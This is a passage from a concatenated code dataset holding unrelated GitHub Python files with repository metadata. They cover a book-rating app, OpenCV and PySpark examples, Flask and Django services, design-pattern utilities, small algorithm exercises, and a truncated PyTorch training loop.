get_isbn(self):\n\t\treturn self.isbn\n\n\tdef set_isbn(self, new_isbn):\n\t\tself.isbn = new_isbn\n\t\tprint(\"The new ISBN is: {0}.\".format(self.isbn))\n\n\tdef add_rating(self, rating):\n\t\tif rating >= 0 and rating <= 4:\n\t\t\tself.rating.append(rating)\n\t\telse:\n\t\t\tprint(\"Invaild Request\")\n\n\tdef __eq__(self, other_book):\n\t\treturn self.title == other_book.title and self.isbn == other_book.isbn\n\n\tdef __ne__(self, other_book):\n\t\treturn self.title != other_book.title or self.isbn != other_book.isbn\n\n\tdef get_average_rating(self):\n\t\ttotal = 0\n\t\ti = 0\n\t\tfor value in self.ratings:\n\t\t\tif value:\n\t\t\t\ttotal += value\n\t\t\t\ti += 1\n\t\ttry:\n\t\t\treturn total / i\n\t\texcept ZeroDivisionError:\n\t\t\treturn 0\n\n\tdef __repr__(self):\n\t\treturn self.title\n\n\tdef __hash__(self):\n\t\treturn hash((self.title, self.isbn))\n\nclass Fiction(Book):\n\tdef __init__(self, title, author, isbn, price):\n\t\tsuper().__init__(title, isbn, price)\n\t\tself.author = author\n\t\tself.ratings = []\n\n\tdef get_author(self):\n\t\treturn self.author\n\n\tdef __repr__(self):\n\t\treturn \"{title} by {author}\".format(title=self.title, author=self.author)\n\nclass Non_Fiction(Book):\n\tdef __init__(self, title, subject, level, isbn, price):\n\t\tsuper().__init__(title, isbn, price)\n\t\tself.subject = subject\n\t\tself.level = level\n\t\tself.ratings = []\n\n\tdef get_subject(self):\n\t\treturn self.subject\n\n\tdef get_level(self):\n\t\treturn self.level\n\n\tdef __repr__(self):\n\t\treturn \"{title}, a {level} manual on {subject}.\".format(title=self.title, level=self.level, subject=self.subject)\n\nclass TomeRater():\n\tdef __init__(self):\n\t\tself.users = {}\n\t\tself.books = {}\n\t\tself.isbns = {}\n\n\tdef create_book(self, title, isbn, price):\n\t\tif isbn not in self.isbns.values():\t\n\t\t\tnew_book = Book(title, isbn, price)\n\t\t\tself.isbns[title] = isbn\n\t\t\treturn new_book\n\t\telse:\n\t\t\tprint(\"This ISBN code is already being used for the book {title}.\".format(title=title))\n\n\tdef create_novel(self, title, author, isbn, price):\n\t\tif isbn not in self.isbns.values():\t\n\t\t\tnew_novel = Fiction(title, author, isbn, price)\n\t\t\tself.isbns[title] = isbn\n\t\t\treturn new_novel\n\t\telse:\n\t\t\tprint(\"This ISBN code is already being used for the novel {title}.\".format(title=title))\n\n\tdef create_non_fiction(self, title, subject, level, isbn, price):\n\t\tif isbn not in self.isbns.values():\t\n\t\t\tnew_non_fonction = Non_Fiction(title, subject, level, isbn, price)\n\t\t\tself.isbns[title] = isbn\n\t\t\treturn new_non_fonction\n\t\telse:\n\t\t\tprint(\"This ISBN code is already being used for the non fiction book {title}.\".format(title=title))\n\n\tdef add_book_to_user(self, book, email, rating=None):\n\t\tuser = self.users.get(email, None)\n\t\tif user:\n\t\t\tuser.read_book(book, rating)\n\t\t\tif book not in self.books:\n\t\t\t\tself.books[book] = 1\n\t\t\telse:\n\t\t\t\tself.books[book] += 1\n\t\telse:\n\t\t\tprint(\"No user with email {0}\".format(email))\n\n\tdef add_user(self, name, email, user_books=None):\n\t\tif email not in self.users:\t\n\t\t\tif \"@\" in email and (\".com\" in email or \".edu\" in email or \".org\" in email):\n\t\t\t\tnew_user = User(name, email)\n\t\t\t\tself.users[email] = new_user\n\t\t\t\tif user_books:\n\t\t\t\t\tfor book in user_books:\n\t\t\t\t\t\tself.add_book_to_user(book, email)\n\t\t\telse:\n\t\t\t\tprint(\"This email is not valid.\")\n\t\telse:\n\t\t\tprint(\"This email is already being used for user {name}.\".format(name=name))\n\n\tdef print_catalog(self):\n\t\tfor key in self.books.keys():\n\t\t\tprint(key)\n\n\tdef print_users(self):\n\t\tfor value in self.users.values():\n\t\t\tprint(value)\n\n\tdef most_read_book(self):\n\t\tread = 0\n\t\tbook = \"\"\n\t\tfor a, b in self.books.items():\n\t\t\tif b > read:\n\t\t\t\tread = b\n\t\t\t\tbook = a\n\t\tif read < 2:\n\t\t\treturn \"{book}, read {read} time.\".format(book=book, read=read)\n\t\telse:\n\t\t\treturn \"{book}, read {read} times.\".format(book=book, read=read)\n\n\tdef highest_rated_book(self):\n\t\thigh = 0\n\t\thigh_book = \"\"\n\t\tfor book in self.books:\n\t\t\tif book.get_average_rating() > high:\n\t\t\t\thigh = book.get_average_rating()\n\t\t\t\thigh_book = book\n\t\treturn \"{book}, rated {high}.\".format(book=high_book, high=high)\n\n\tdef most_positive_user(self):\n\t\thigh = 0\n\t\thigh_user = \"\"\n\t\tfor user in self.users.values():\n\t\t\tif user.get_average_rating() > high:\n\t\t\t\thigh = user.get_average_rating()\n\t\t\t\thigh_user = user\n\t\treturn \"{user}, with an average rating of {high}.\".format(user=high_user.name, high=high)\n\n\tdef most_expensive_book(self):\n\t\thigh = 0\n\t\thigh_book = \"\"\n\t\tfor book in self.books:\n\t\t\tif book.price > high:\n\t\t\t\thigh = book.price\n\t\t\t\thigh_book = book\n\t\treturn \"{b}, which costs {price}$.\".format(b=str(high_book), price=high)\n\n\tdef get_n_most_read_books(self, n):\n\t\tchoices = dict(self.books)\n\t\tread = 0\n\t\tbook = \"\"\n\t\tserie = \"\"\n\t\ti = 0\n\t\twhile n > 0:\n\t\t\tfor key, value in choices.items():\n\t\t\t\tif value > read:\n\t\t\t\t\tread = value\n\t\t\t\t\tbook = key\n\t\t\ttry:\n\t\t\t\tdel choices[book]\n\t\t\texcept KeyError:\n\t\t\t\treturn(\"Not enough books for the number that was input.\")\n\t\t\t\tbreak\t\n\t\t\tn -= 1\n\t\t\ti += 1\n\t\t\tserie += \"{I}: {b}, read {num} times.\".format(I=i, b=str(book), num=read)\n\t\t\tif n != 0:\n\t\t\t\tserie += \"\\n\"\n\t\t\tbook = \"\"\n\t\t\tread = 0\n\t\telse:\n\t\t\treturn serie\n\n\tdef get_n_most_positive_users(self, n):\n\t\tchoices = dict(self.users)\n\t\thigh = 0\n\t\thigh_user = \"\"\n\t\thigh_list = \"\"\n\t\tk = \"\"\n\t\ti = 0\n\t\twhile n > 0:\n\t\t\tfor key, user in choices.items():\n\t\t\t\tif user.get_average_rating() > high:\n\t\t\t\t\thigh = user.get_average_rating()\n\t\t\t\t\thigh_user = user\n\t\t\t\t\tk = key\n\t\t\ttry:\n\t\t\t\tdel choices[k]\t\n\t\t\texcept KeyError:\n\t\t\t\treturn(\"Not enough users for the number that was input.\")\n\t\t\t\tbreak\t\n\t\t\tn -= 1\n\t\t\ti += 1\n\t\t\thigh_list += \"{I}: {user}, with an average rating of {high}.\".format(I=i, user=str(high_user.name), high=high)\n\t\t\tif n != 0:\n\t\t\t\thigh_list += \"\\n\"\n\t\t\thigh_user = \"\"\n\t\t\thigh = 0\n\t\telse:\n\t\t\treturn high_list\n\n\tdef get_n_most_expensive_books(self, n):\n\t\tchoices = dict(self.books)\n\t\thigh = 0\n\t\tbook = \"\"\n\t\tbook_list = \"\"\n\t\tk = \"\"\n\t\ti = 0\n\t\twhile n > 0:\n\t\t\tfor key in choices.keys():\n\t\t\t\tif key.price > high:\n\t\t\t\t\thigh = key.price\n\t\t\t\t\tbook = key\n\t\t\ttry:\n\t\t\t\tdel choices[book]\n\t\t\texcept KeyError:\n\t\t\t\treturn(\"Not enough books for the number that was input.\")\n\t\t\t\tbreak\n\t\t\tn -= 1\n\t\t\ti += 1\n\t\t\tbook_list += \"{I}: {b}, which costs {price}$.\".format(I=i, b=str(book), price=high)\n\t\t\tif n != 0:\n\t\t\t\tbook_list += \"\\n\"\n\t\t\tbook = \"\"\n\t\t\thigh = 0\n\t\telse:\n\t\t\treturn book_list\n\n\tdef get_worth_of_user(self, user_email):\n\t\tu = self.users[user_email]\n\t\ttotal = 0\n\t\tfor book in u.books.keys():\n\t\t\ttotal += book.price\n\t\treturn \"{name} has {p}$ worth of books in his account.\".format(name=u.name, p=round(total, 2))\n\n\tdef __repr__(self):\n\t\tu = \"\"\n\t\tfor user in self.users.values():\n\t\t\tu += str(user)\n\t\t\tu += \"\\n\"\n\t\tb = \"\"\n\t\tfor book in self.books.keys():\n\t\t\tb += str(book)\n\t\t\tb += \"\\n\"\n\t\treturn \"Users:\\n{users}\\nBooks:\\n{books}\".format(users=u, books=b)\n\n\tdef __eq__(self, other):\n\t\treturn self.users == other.users and self.books == other.books\n\n\tdef __ne__(self, other):\n\t\treturn self.users != other.users or self.books != other.books\n\n\n\n\n\n","repo_name":"MaxDude132/pwp-capstones","sub_path":"TomeRater/TomeRater.py","file_name":"TomeRater.py","file_ext":"py","file_size_in_byte":8074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7804729092","text":"import os\nimport cv2\n\nimg_height = 512\nimg_width = 512\n\n\ndef change_brightness(img, value=30):\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n h, s, v = cv2.split(hsv)\n v = cv2.add(v, value)\n v[v > 255] = 255\n v[v < 0] = 0\n final_hsv = cv2.merge((h, s, v))\n img = cv2.cvtColor(final_hsv, cv2.COLOR_HSV2BGR)\n return img\n\n\ndef fast_brightness(input_image, brightness=30):\n \"\"\" input_image: color or grayscale image\n brightness: -255 (all black) to +255 (all white)\n\n returns image of same type as input_image but with\n brightness adjusted\"\"\"\n img = input_image.copy()\n cv2.convertScaleAbs(img, img, 1, brightness)\n return img\n\n\nimage = cv2.imread(\"dataset/001/21.jpg\")\ncv2.imshow(\"Input\", image)\n\nimage1 = change_brightness(image.copy(), -50)\ncv2.imshow(\"Output 1\", image1)\n\nimage2 = fast_brightness(image.copy(), -50)\ncv2.imshow(\"Output fast\", image2)\n\nkey = cv2.waitKey(0) & 0xFF\n","repo_name":"bpawluczuk/object-detection","sub_path":"image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"71574665699","text":"# -*- coding: utf-8 -*-#\n\n# -------------------------------------------------------------------------------\n# Name: DataFrameExample001\n# Description:\n# Author: orange\n# Date: 2021/6/7\n# -------------------------------------------------------------------------------\n\nfrom pyspark.sql import SparkSession\n\nfrom common.log.logger import Log4j\n\nif __name__ == \"__main__\":\n spark = SparkSession \\\n .builder \\\n .master(\"local[3]\") \\\n .appName(\"HelloSparkSQL\") \\\n .getOrCreate()\n\n logger = Log4j(spark)\n\n surveyDF = spark.read \\\n .option(\"header\", \"true\") \\\n .option(\"inferSchema\", \"true\") \\\n .csv(\"file:///E:\\OpenSource\\GitHub\\pyspark-example\\dataset\\sample.csv\")\n\n surveyDF.createOrReplaceTempView(\"survey_tbl\")\n countDF = spark.sql(\"select Country, count(1) as count from survey_tbl where Age<40 group by Country\")\n\n countDF.show()","repo_name":"lj-michale/pyspark-example","sub_path":"app/pyspark3/learning/dataframe/DataFrameExample001.py","file_name":"DataFrameExample001.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"16461391235","text":"from concurrent.futures import ProcessPoolExecutor as Pool\nfrom typing import Iterable, Iterator, Optional\n\nfrom torch import clamp, log, nn\n\nfrom ..chemprop.data import MoleculeDatapoint, MoleculeDataset\nfrom ..chemprop.features import BatchMolGraph, mol2graph\n\nfrom molpal.models.utils import batches\n\ndef get_loss_func(dataset_type: str,\n uncertainty_method: Optional[str] = None) -> nn.Module:\n \"\"\"Get the loss function corresponding to a given dataset type\n\n Parameters\n ----------\n dataset_type : str\n the type of dataset\n uncertainty_method : Optional[str]\n the uncertainty method being used\n\n Returns\n -------\n loss_function : nn.Module\n a PyTorch loss function\n\n Raises\n ------\n ValueError\n if is dataset_type is neither \"classification\" nor \"regression\"\n \"\"\"\n if dataset_type == 'classification':\n return nn.BCEWithLogitsLoss(reduction='none')\n\n elif dataset_type == 'regression':\n if uncertainty_method == 'mve':\n return negative_log_likelihood\n\n return nn.MSELoss(reduction='none')\n\n raise ValueError(f'Unsupported dataset type: \"{dataset_type}.\"')\n\ndef negative_log_likelihood(pred_mean, pred_var, targets):\n \"\"\"The NLL loss function as defined in:\n Nix, D.; Weigend, A. ICNN’94. 1994; pp 55–60 vol.1\"\"\"\n clamped_var = clamp(pred_var, min=0.00001)\n return (log(clamped_var)/2\n + (pred_mean - targets)**2/(2*clamped_var))\n\ndef batch_graphs(smis: Iterable[str], minibatch_size: int = 50,\n n_workers: int = 1) -> Iterator[BatchMolGraph]:\n \"\"\"Generate BatchMolGraphs from the SMILES strings\n\n Uses parallel processing to buffer a chunk of BatchMolGraphs into memory,\n where the chunksize is equal to the number of workers available. Only\n prepares one chunk at a time due to the exceedingly large memory footprint \n of a BatchMolGraph\n\n Parameters\n ----------\n smis : Iterable[str]\n the SMILES strings from which to generate BatchMolGraphs\n minibatch_size : int\n the number of molecular graphs in each BatchMolGraph\n n_workers : int\n the number of workers to parallelize BatchMolGraph preparation over\n \n Yields\n ------\n BatchMolGraph\n a batch of molecular graphs of size \n \"\"\"\n # need a dataset if we're going to use features\n # test_data = MoleculeDataset([\n # MoleculeDatapoint(smiles=smi,) for smi in smis\n # ])\n chunksize = minibatch_size*n_workers\n with Pool(max_workers=n_workers) as pool:\n for chunk_smis in batches(smis, chunksize):\n smis_minibatches = list(batches(chunk_smis, minibatch_size))\n for batch_graph in pool.map(mol2graph, smis_minibatches):\n yield batch_graph\n\n","repo_name":"UnixJunkie/molpal","sub_path":"molpal/models/mpnn/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"34"} +{"seq_id":"28237624810","text":"from flask import Flask, request\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/sum', methods=['POST'])\r\ndef calculate_sum():\r\n data = request.get_json()\r\n result = sum(data.values())\r\n return {'sum': result}\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True, host='0.0.0.0')","repo_name":"StefanRae/dtc-dr","sub_path":"flask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"38333213516","text":"import time\nfrom django.core import urlresolvers\nfrom django.conf import settings\nfrom django.shortcuts import get_object_or_404\nfrom django.utils.cache import patch_vary_headers\nfrom django.utils.http import cookie_date\nfrom models import Game\n\nclass SessionMiddleware(object):\n def get_game(self, request):\n resolver = urlresolvers.RegexURLResolver(r'^/', settings.ROOT_URLCONF)\n view, args, kwargs = resolver.resolve(request.path_info)\n return get_object_or_404(Game, name=kwargs['game_name'])\n \n def get_cookie_name(self, game):\n return 'game_session_%s' % game.id\n \n def get_cookie_path(self, game):\n return '/%s' % game.name\n \n def process_request(self, request):\n request.game = game = self.get_game(request)\n engine = __import__(settings.SESSION_ENGINE, {}, {}, [''])\n session_key = request.GET.get(settings.LOGIN_KEY_NAME, request.COOKIES.get(self.get_cookie_name(game)))\n request.session = engine.SessionStore(session_key)\n \n\n def process_response(self, request, response):\n \"\"\"\n If request.session was modified, or if the configuration is to save the\n session every time, save the changes and set a session cookie.\n \"\"\"\n try:\n accessed = request.session.accessed\n modified = request.session.modified\n logoutflag = request.session.get('logout',False)\n except (AttributeError,KeyError):\n pass\n else:\n if accessed:\n patch_vary_headers(response, ('Cookie',))\n if modified or settings.SESSION_SAVE_EVERY_REQUEST or request.GET.get(settings.LOGIN_KEY_NAME):\n if request.session.get_expire_at_browser_close():\n max_age = None\n expires = None\n else:\n max_age = request.session.get_expiry_age()\n expires_time = time.time() + max_age\n expires = cookie_date(expires_time)\n # Save the session data and refresh the client cookie.\n request.session.save()\n response.set_cookie(self.get_cookie_name(request.game),\n request.session.session_key, max_age=None,\n expires=expires, domain=settings.SESSION_COOKIE_DOMAIN,\n path=self.get_cookie_path(request.game),\n secure=settings.SESSION_COOKIE_SECURE or None)\n if logoutflag:\n for game in Game.objects.all():\n response.delete_cookie(self.get_cookie_name(game),path=self.get_cookie_path(game),domain=settings.SESSION_COOKIE_DOMAIN)\n request.session['logout']=False\n request.session.save()\n request.session['LOGOUT']=False\n return response\n","repo_name":"meliascosta/juegosdemente","sub_path":"contributable_games/game_session_middleware.py","file_name":"game_session_middleware.py","file_ext":"py","file_size_in_byte":2861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"44616534471","text":"import os.path\n\nimport flask\n\nfrom os import getcwd\nfrom datetime import datetime\nfrom ner import predict_ner\n\nimport logging\n\napp = flask.Flask(__name__)\napp.config['JSON_SORT_KEYS'] = False\n\nlogs_folder_path = os.path.join(getcwd(), 'logs')\nos.makedirs(logs_folder_path, exist_ok=True)\nlog_path = os.path.join(f'{logs_folder_path}', f'{datetime.date(datetime.now())}.log')\nlogging.basicConfig(format=u'%(levelname)-8s [%(asctime)s] %(message)s',\n level=logging.DEBUG,\n filename=log_path,\n filemode='a',\n datefmt='%d-%b-%y %H:%M:%S')\nlogging.getLogger('deeppavlov').setLevel(logging.ERROR)\nlogging.getLogger('tensorflow').setLevel(logging.ERROR)\n\n\n@app.route('/api/extract-personal-data', methods=['GET'])\ndef extract_personal_data() -> flask.Response:\n logging.debug(f'The request was received to search for NER tags.')\n answer = {}\n try:\n request_data = flask.jsonify(flask.request.form).json\n text = request_data.get('text', '')\n if not text:\n answer['message'] = 'The text was not passed to the api method.'\n return flask.make_response(flask.jsonify(answer), 400)\n predicted_ner = predict_ner(text)\n answer['message'] = predicted_ner\n return flask.make_response(flask.jsonify(answer), 200)\n\n except Exception as e:\n logging.exception(e)\n return flask.jsonify(flask.Response(f'Some error occured: {e}', 500))\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5001)\n","repo_name":"onlycska/depersonalization-of-data","sub_path":"ner_service/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"34026316467","text":"from __future__ import division, print_function, absolute_import\n\nimport sys\nimport traceback\nfrom abc import ABCMeta, abstractmethod\n\nfrom . import UniqueModule\n\n\nclass Singleton(type):\n \"\"\"\n Metaclass ensuring only one instance of the class exists.\n\n The singleton pattern ensures that a class has only one instance\n and provides a global point of access to that instance.\n\n Methods\n -------\n __call__\n\n Notes\n -----\n To define a class as a singleton include the :data:`__metaclass__`\n directive.\n\n See Also\n --------\n :class:`Borg`\n\n Examples\n --------\n Define a singleton class:\n\n >>> from mlpy.modules.patterns import Singleton\n >>> class MyClass(object):\n >>> __metaclass__ = Singleton\n\n .. note::\n | Project: Code from `StackOverflow `_.\n | Code author: `theheadofabroom `_\n | License: `CC-Wiki `_\n\n \"\"\"\n _instance = {}\n\n def __call__(cls, *args, **kwargs):\n \"\"\"Returns instance to object.\"\"\"\n if cls not in cls._instance:\n # noinspection PyArgumentList\n cls._instance[cls] = super(Singleton, cls).__call__(*args, **kwargs)\n return cls._instance[cls]\n\n\nclass Borg(object):\n \"\"\"Class ensuring that all instances share the same state.\n\n The borg design pattern ensures that all instances of a class share\n the same state and provides a global point of access to the shared state.\n\n Rather than enforcing that only ever one instance of a class exists,\n the borg design pattern ensures that all instances share the same state.\n That means every the values of the member variables are the same for every\n instance of the borg class.\n\n The member variables which are to be shared among all instances must be\n declared as class variables.\n\n See Also\n --------\n :class:`Singleton`\n\n Notes\n -----\n One side effect is that if you subclass a borg, the objects all have the\n same state, whereas subclass objects of a singleton have different states.\n\n Examples\n --------\n Create a borg class:\n\n >>> from mlpy.modules.patterns import Borg\n >>> class MyClass(Borg):\n >>> shared_variable = None\n\n .. note::\n | Project: Code from `ActiveState `_.\n | Code author: `Alex Naanou `_\n | License: `CC-Wiki `_\n\n \"\"\"\n _shared_state = {}\n\n def __new__(cls, *p, **k):\n # noinspection PyArgumentList\n self = object.__new__(cls, *p, **k)\n self.__dict__ = cls._shared_state\n return self\n\n\nclass RegistryInterface(type):\n \"\"\"Metaclass registering all subclasses derived from a given class.\n\n The registry interface adds every class derived from a given class\n to its registry dictionary. The `registry` attribute is a class\n variable and can be accessed anywhere. Therefore, this interface can\n be used to find all subclass of a given class.\n\n One use case are factory classes.\n\n Attributes\n ----------\n registry : list\n List of all classes deriving from a registry class.\n\n Methods\n -------\n __init__\n\n Examples\n --------\n Create a registry class:\n\n >>> from mlpy.modules.patterns import RegistryInterface\n >>> class MyRegistryClass(object):\n ... __metaclass__ = RegistryInterface\n\n .. note::\n | Project: Code from `A Primer on Python Metaclasses `_.\n | Code author: `Jake Vanderplas `_\n | License: `CC-Wiki `_\n\n \"\"\"\n __metaclass__ = ABCMeta\n\n def __init__(cls, name, bases, dct):\n \"\"\"Register the deriving class on instantiation.\"\"\"\n if not hasattr(cls, 'registry'):\n cls.registry = {}\n else:\n cls.registry[name.lower()] = cls\n\n super(RegistryInterface, cls).__init__(name, bases, dct)\n\n\nclass Observable(UniqueModule):\n \"\"\"The observable base class.\n\n The observable keeps a record of all listeners and notifies them\n of the events they have subscribed to by calling :meth:`Listener.notify`.\n\n The listeners are notified by calling :meth:`dispatch`. Listeners are notified\n if either the event that is being dispatched is ``None`` or the listener has\n subscribed to a ``None`` event, or the name of the event the listener has subscribed\n to is equal to the name of the dispatching event.\n\n An event is an object consisting of the `source`; i.e. the observable, the event\n `name`, and the event `data` to be passed to the listener.\n\n Parameters\n ----------\n mid : str\n The module's unique identifier\n\n Methods\n -------\n dispatch\n load\n save\n subscribe\n unsubscribe\n\n Examples\n --------\n >>> from mlpy.modules.patterns import Observable\n >>>\n >>> class MyObservable(Observable):\n >>> pass\n >>>\n >>> o = MyObservable()\n\n This defines the observable `MyObservable` and creates\n an instance of it.\n\n >>> from mlpy.modules.patterns import Listener\n >>>\n >>> class MyListener(Listener):\n >>>\n >>> def notify(self, event):\n >>> print \"I have been notified!\"\n >>>\n >>> l = MyListener(o, \"test\")\n\n This defines the listener `MyListener` that when notified will print\n the same text to the console regardless of which event has been thrown\n (as long as the listener has subscribed to the event). Then an instance\n of MyListener is created that subscribes to the event `test` of `MyObservable`.\n\n When the event `test` is dispatched by the observable, the listener is notified\n and the text is printed on the stdout:\n\n >>> o.dispatch(\"test\", **{})\n I have been notified!\n\n \"\"\"\n class Event(object):\n \"\"\"Event being dispatched by the observable.\n\n Parameters\n ----------\n source : Observable\n The observable instance.\n name : str\n The name of the event.\n data : dict\n The information to be send.\n\n \"\"\"\n def __init__(self, source, name, data=None):\n self.source = source\n self.name = name\n self.data = data if data is not None else {}\n\n def __init__(self, mid=None):\n super(Observable, self).__init__(mid)\n\n self._listeners = {}\n\n def subscribe(self, listener, events=None):\n \"\"\"Subscribe to the observable.\n\n Parameters\n ----------\n listener : Listener\n The listener instance.\n events : str or list[str] or tuple[str] or None\n The event names the listener wants to be notified about.\n\n \"\"\"\n if events is not None and not isinstance(events, (list, tuple)):\n events = (events,)\n\n self._listeners[listener] = events\n\n def unsubscribe(self, listener):\n \"\"\"Unsubscribe from the observable.\n\n The listener is removed from the list of listeners.\n\n Parameters\n ----------\n listener : Listener\n The listener instance.\n\n \"\"\"\n del self._listeners[listener]\n\n def dispatch(self, name, **attrs):\n \"\"\"Dispatch the event to all listeners.\n\n Parameters\n ----------\n name : str\n The name of the event to dispatch.\n attrs : dict\n The information send to the listeners.\n\n \"\"\"\n # Create the event to send\n e = Observable.Event(self, name, {k: v for k, v in attrs.iteritems()})\n\n # Notify all listeners of this event\n for listener, events in self._listeners.items():\n if events is None or name is None or name in events:\n try:\n listener.notify(e)\n except Exception:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n traceback.print_exception(exc_type, exc_value, exc_traceback)\n sys.exit(1)\n\n\nclass Listener(object):\n \"\"\"The listener interface.\n\n A listener subscribes to an observable identifying the events the listener is\n interested in. The observable calls :meth:`notify` to send relevant event information.\n\n Parameters\n ----------\n o : Observable, optional\n The observable instance.\n events : str or list[str], optional\n The event names the listener wants to be notified about.\n\n Notes\n -----\n Every class inheriting from Listener must implement :meth:`notify`, which\n defines what to do with the information send by the observable.\n\n Examples\n --------\n >>> from mlpy.modules.patterns import Observable\n >>>\n >>> class MyObservable(Observable):\n >>> pass\n >>>\n >>> o = MyObservable()\n\n This defines the observable `MyObservable` and creates\n an instance of it.\n\n >>> from mlpy.modules.patterns import Listener\n >>>\n >>> class MyListener(Listener):\n >>>\n >>> def notify(self, event):\n >>> print \"I have been notified!\"\n >>>\n >>> l = MyListener(o, \"test\")\n\n This defines the listener `MyListener` that when notified will print\n the same text to the console regardless of which event has been thrown\n (as long as the listener has subscribed to the event). Then an instance\n of MyListener is created that subscribes to the event `test` of `MyObservable`.\n\n When the event `test` is dispatched by the observable, the listener is notified\n and the text is printed on the stdout:\n\n >>> o.dispatch(\"test\", **{})\n I have been notified!\n\n \"\"\"\n __metaclass__ = ABCMeta\n\n def __init__(self, o=None, events=None):\n if o is not None:\n o.subscribe(self, events)\n\n @abstractmethod\n def notify(self, event):\n \"\"\"Notification from the observable.\n\n Parameters\n ----------\n event : Observable.Event\n The event object dispatched by the observable consisting of `source`;\n i.e. the observable, the event `name`, and the event `data`.\n\n Raises\n ------\n NotImplementedError\n If the child class does not implement this function.\n\n Notes\n -----\n This is an abstract method and *must* be implemented by its deriving class.\n\n \"\"\"\n raise NotImplementedError\n","repo_name":"evenmarbles/mlpy","sub_path":"mlpy/modules/patterns.py","file_name":"patterns.py","file_ext":"py","file_size_in_byte":10676,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"34"} +{"seq_id":"7957569510","text":"# Definition for a binary tree node.\nfrom typing import List\n\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n def sortedArrayToBST(self, nums: List[int]) -> TreeNode:\n if not nums:\n return None\n \n ix_root_val = len(nums) // 2\n root_node = TreeNode(nums[ix_root_val])\n root_node.left = self.sortedArrayToBST(nums[:ix_root_val])\n root_node.right = self.sortedArrayToBST(nums[ix_root_val + 1:])\n return root_node\n\n\nclass Solution2:\n def sortedArrayToBST(self, nums: List[int]) -> TreeNode:\n if not nums:\n return None\n\n root = TreeNode(0)\n node, stack = root, []\n l, r = 0, len(nums)\n\n while l < len(nums):\n while l < r:\n stack.append((node, l, r))\n r = (l + r) // 2\n if l >= r:\n break\n node.left = TreeNode(0)\n node = node.left\n\n node, l, r = stack.pop()\n m = (l + r) // 2\n node.val = nums[m]\n l = m + 1\n if l < r:\n node.right = TreeNode(0)\n node = node.right\n\n return root\n","repo_name":"aBulgakoff/algos","sub_path":"leetcode/tree/108_convert_sorted_arr_to_bst.py","file_name":"108_convert_sorted_arr_to_bst.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32205684118","text":"# Exercice 5\r\n\r\n# Création de la fonction checkFeb pour vérifier le nombre de jours en février.\r\n\r\ndef checkFeb():\r\n if mois == 2 and jour >= 28:\r\n print(\"Nous sommes en février. Ce jour ne peut pas exister.\")\r\n quit()\r\n return\r\n\r\n\r\n# Requête de la date à l'utilisateur\r\n\r\njour = int(input(\"Entrez le jour :\"))\r\nif jour > 31:\r\n print(\"Ce jour n'existe pas\")\r\n quit()\r\nelif jour < 1:\r\n print(\"Ce jour n'existe pas\")\r\n quit()\r\n\r\nmois = int(input(\"Entrez le mois :\"))\r\ncheckFeb()\r\nif mois > 12:\r\n print(\"Ce mois n'existe pas\")\r\n quit()\r\nelif mois < 1:\r\n print(\"Ce mois n'existe pas\")\r\n quit()\r\n\r\nannee1 = int(input(\"Entrez l'année :\"))\r\nannee2 = str(annee1)\r\nif len(annee2) > 4:\r\n print(\"Le format de l'année est invalide.\")\r\n quit()\r\n\r\nprint(\"Nous sommes le \",jour,\"/\",mois,\"/\",annee2,\".\")\r\n","repo_name":"heyimgab/nsi2021-2022","sub_path":"PYTHON/Programmes/isdatevalid.py","file_name":"isdatevalid.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"13207844305","text":"class Node():\n def __init__ (self,data):\n self.data = data\n self.next = None\n \nclass CircularLL():\n def __init__ (self):\n self.head = None\n self.tail = None\n def append(self,value):\n n = Node(value)\n if self.head:\n self.head.next = n\n self.head = n\n else:\n self.head = n\n self.tail = n\n self.head.next = self.tail\n \nc = CircularLL()\nc.append(10)\nc.append(20)\nc.append(30)\nc.append(40)\n\nfirst_node = c.tail\nprint(first_node.data)\nnode = first_node.next\nwhile node:\n if node.data != first_node.data:\n print(node.data)\n else:\n break\n node = node.next\n","repo_name":"basu-sanjana1619/python_projects","sub_path":"circular_LL.py","file_name":"circular_LL.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72659585698","text":"import os\nimport sys\nimport time\nimport torch\nimport pathlib\nimport logging\nimport numpy as np\nfrom torch import nn\nfrom tqdm import tqdm\nfrom tensorboardX import SummaryWriter\nfrom utils.modelsummary import get_model_summary\nfrom utils.train_utils import AverageMeter, get_confusion_matrix, adjust_learning_rate, create_logger\n\n\ndef train(config, dataloader, model, loss_fn, optimizer, epoch, scaler, writer_dict):\n model.train()\n \n batch_time = AverageMeter()\n ave_loss = AverageMeter()\n tic = time.time()\n steps_per_epoch = len(dataloader) \n steps_tot = epoch*steps_per_epoch\n writer = writer_dict['writer']\n global_steps = writer_dict['train_global_steps']\n \n for step, batch in enumerate(dataloader):\n X, y, _, _ = batch\n X, y = X.cuda(), y.long().cuda()\n \n # Compute prediction and loss\n with 